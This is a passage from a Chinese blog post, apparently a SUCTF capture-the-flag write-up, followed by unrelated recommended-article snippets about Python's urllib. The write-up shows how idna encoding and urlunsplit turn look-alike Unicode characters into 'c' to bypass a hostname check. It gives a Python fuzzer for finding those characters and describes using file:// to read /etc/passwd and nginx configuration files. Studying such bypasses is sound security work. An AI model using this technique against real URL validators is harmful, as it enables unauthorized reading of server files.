python urllib.parse_python urllib.parse.urlunsplit() [idna编码utf-8解码等因素]函数会把奇奇怪怪的(ⓒ ℂ ℭ)变成正常的C,其他的应该也...

最新推荐文章于 2023-03-10 09:44:14 发布
最新推荐文章于 2023-03-10 09:44:14 发布
阅读量174 收藏
点赞数
文章标签: python urllib.parse
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39636102/article/details/113964510
版权

01ddc0d4b35a

image.png

打开题目可以看到源码

01ddc0d4b35a

image.png

这里利用了python urllib.parse urlunsplit() 函数会把奇奇怪怪的(ⓒ ℂ ℭ)变成正常的C

01ddc0d4b35a

image.png

至于怎么找到这些奇奇怪怪的C,

from flask import Flask, Blueprint, request, Response, escape ,render_template

from urllib.parse import urlsplit, urlunsplit, unquote

from urllib import parse

import urllib.request

def fuzzing():

for i in range(65536):

uni = chr(i)

url = "http://suctf.c{}".format(uni)

try:

if getUrl(url):

print("str:"+uni+" unicode: \\u"+str(hex(i))[2:])

exit()

except:

pass

pass

def getUrl(url):

host = parse.urlparse(url).hostname

print(host)

if host == 'suctf.cc':

return False

parts = list(urlsplit(url))

host = parts[1]

print(host)

if host == 'suctf.cc':

return False

newhost = []

for h in host.split('.'):

newhost.append(h.encode('idna').decode('utf-8'))

parts[1] = '.'.join(newhost)

#去掉 url 中的空格

finalUrl = urlunsplit(parts).split(' ')[0]

print(finalUrl)

host = parse.urlparse(finalUrl).hostname

print(host)

if host == 'suctf.cc':

return True

else:

return False

fuzzing()

然后使用file://协议来读取etc/passwd看看

01ddc0d4b35a

image.png

01ddc0d4b35a

可以读取

然而读取根目录下flag或flag.txt是不行的,没有这个

但题目说了nginx,那么查一下nginx配置文件,

01ddc0d4b35a

image.png

01ddc0d4b35a

image.png

01ddc0d4b35a

image.png

就找到flag了

比如说F

01ddc0d4b35a

image.png

python3 urllib安装包_Python urllib3软件包的使用说明
weixin_39611174的博客
12-15 1156
urllib3是一款Python 3的HTTP客户端。Python标准库提供了urllib。在Python 2中,另外提供了urllib2;而在Python 3中,重构了urlliburllib2到标准库urllib,并另外提供了urllib3。1. urllib3的特性线程安全连接缓冲池客户端SSL/TLS验证文件上传请求重试HTTP重定向支持gzip和deflate encoding支持HT...
python 指定证书验证_Python通过OpenSSL获取指定域名对应的SSL证书
weixin_39781326的博客
12-14 818
同一台服务器上配置了不同的虚拟主机域名证书也可以获取到,直接上代码了:def get_certificate(hostname, port):import idnafrom socket import socketfrom OpenSSL import SSLsock = socket()# sock.settimeout(10) # 不要开启sock.setblocking(True) # 关键...
python urlunplist()方法
微信公众号:码奋
07-23 189
它是将链接各部分组合成完整链接的方法,传入参数也算是一个可以迭代对象,例如列表,元组,长度必须是5 from urllib.parse import urlunsplit data=['http','www.baidu.com','index.html','a=6','comment'] print(urlunsplit(data)) 运行结果 http://www.baidu.com...
python web编程---geturl(),urlunparse()
只有自己拼尽全力后,才能说自己运气不好。
11-02 1812
1 反解析 可以利用一些方法将分解的url的哥哥
Python实战:python URL请求地址的拼接,标准库urllib.parse详解
SteveRocket's-Blog
03-09 1万+
Python中,我们经常需要对URL地址进行拼接操作,以便访问特定的资源。URL地址由多个部分组成,包括协议、主机名、端口号、路径、查询参数和锚点等。其中Python的标准库urllib.parse提供了处理URL的功能,包括解析、构建和分割URL等操作。下面我们将逐一介绍urllib.parse模块中常用的方法,介绍如何使用PythonURL地址进行拼接。
pythonurllib.parse 用于解析 URL
最新发布
点点关注不迷路
03-10 2136
pythonurllib.parse 用于解析 URL
Pythonurllib库用法详解
IT之一小佬的博客
05-05 4807
Pythonurllib库用法详解
Python编程进阶:urllib.parse从基础到高级应用
`urllib.parse`是Python标准库中的一个模块,它用于对URL进行解析和构建,以及对URL的不同部分进行操作。这个模块非常适用于需要对网络请求的URL进行精细化处理的场景,比如在Web爬虫中生成和解析复杂的URL查询字符...
python urllib.parse
一位在路上的工程师的博客
09-03 568
urlparse from urllib.parse import urlparse, urlunparse result = urlparse('http://www.baidu.com/index.html;user?id=5#comment') print(result) ParseResult(scheme='http', netloc='www.baidu.com', path=...
Python urllib.parseurlencode的使用
weixin_43891121的博客
03-10 3197
params = { 'aid': '24', 'app_name': 'web_search', 'offset': '0', 'format': 'json', 'keyword': '%E9%87%91%E6%AF%9B', 'autoload': 'true', 'count': '20', 'en_qc': '1', ...
爬虫:URL解析链接
二十四桥明月夜
11-28 2405
目录 urlparse() :实现URL的识别和分段 urlparse() 方法其他API用法 urlunparse() :实现URL拼接 urlsplit():解析URL把params和并到path中 urlunsplit() :完成链接拼接 urljoin():完成链接的合并 urlencode() :序列化为GET请求参数 parse_qs():反序列:字典 parse_qsl() 反序列化:列表 quote() :将内容转化为URL编码的格式 unquote():将UR...
Python3模块详解--老司机工具urllib模块详解之urllib.parse子模块
郑小小小小源的博客
09-02 1万+
This module defines a standard interface to break Uniform Resource Locator (URL) strings up in components (addressing scheme, network location, path etc.), to combine the components back into a URL
urllib.parse解析url
weixin_40173577的博客
09-05 1261
目录介绍主要方法urlparseurlunparseurlspliturlunspliturljoinurlencodeparse_qsparse_qslquoteunquote 介绍 parse模块是urllib库的一个工具模块,可用于对url解析、编码等操作。 主要方法 方法 说明 urlparseurl各部分拆分 urlunparse urlparse的反向操作,将各部分组合为url urlspliturl各部分拆分(类似urlparse ) urlunsplit
urllib.parse.urlunparse用法
qq_27361945的博客
03-03 2343
#url组合 #urllib.parse.urlunparse将路径组合成url import urllib.parse data =['http','www.baidu.com','index.html','user','a=6','comment'] url = urllib.parse.urlunparse(data) ''' Construct a URL from a tuple as ...
关于pythonurl处理
热门推荐
代码改变世界
10-05 2万+
基本环境: python2.71 完整的url语法格式: 协议://用户名@密码:子域名.域名.顶级域名:端口号/目录/文件名.文件后缀?参数=值#标识2 urlparse模块对url的处理方法 urlparse模块对url的主要处理方法有:urljoin/urlsplit/urlunsplit/urlparse等。该模块对url的定义采用六元组的形式:schema://netloc/pa
python pdb pip安装_Python 使用pip安装pymysql模块 (错误:ImportError: No module named pymysql)...
weixin_39757212的博客
12-15 876
1.使用root权限2.查看pip是否可用(直接输入pip查看)如下表示可以使用pip[root@iZ23kick03xZ python_db]# pipUsage:pip [options]Commands:install Install packages.download Download packages.unin...
PythonURL编码(urlencode)和URL解码(parse_qs)
Alan的博客
04-10 4619
提要:编码urlencode()函数 解码用 (parse_qs) 图片: 代码: #encoding: utf-8 from urllib import request from urllib import parse keyword = {"wd":"庄宿正"} encode = parse.urlencode(keyword) print(encode) print(...
Python写网络爬虫之:构造和解析URL
qq_42902997的博客
07-29 4861
1. URL 的组成 URL 全称为统一资源定位器,网络上的每一个资源(网页、图片、文字、链接)都有一个特定的 “标识”,这个就是URL 2. 什么时候回用到 URL? 当我们想构造一个网络爬虫来爬取网络资源的时候,我们要构造一个 URL 让爬虫去访问,然后把资源背回来。所以我们要学习 URL 的相关知识。 3. URL 的组成有哪几个部分? http://www.baidu.com/index.html;user?id=5#comment 协议 http 域名 www.baidu.com 路径
[240]pythonurllib.parse库解析URL
周小董
07-04 1万+
除了 urlparse() 之外,还有一个类似的 urlsplit() 函数也能对 URL 进行拆分,所不同的是, urlsplit() 并不把 路径参数(params) 从 路径(path) 中分离出来。如果只是希望对特殊字符进行转义,那么可以使用 quote 或 quote_plus 函数,其中 quote_plus 比 quote 更激进一些,把 : 、 / 一类的符号也给转义了。除此之外, urllib.parse 还提供了一个 urljoin() 函数,来将相对路径转换成绝对路径的 URL
获取URL中query参数的两种方法
weixin_40289389的博客
09-01 4203
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值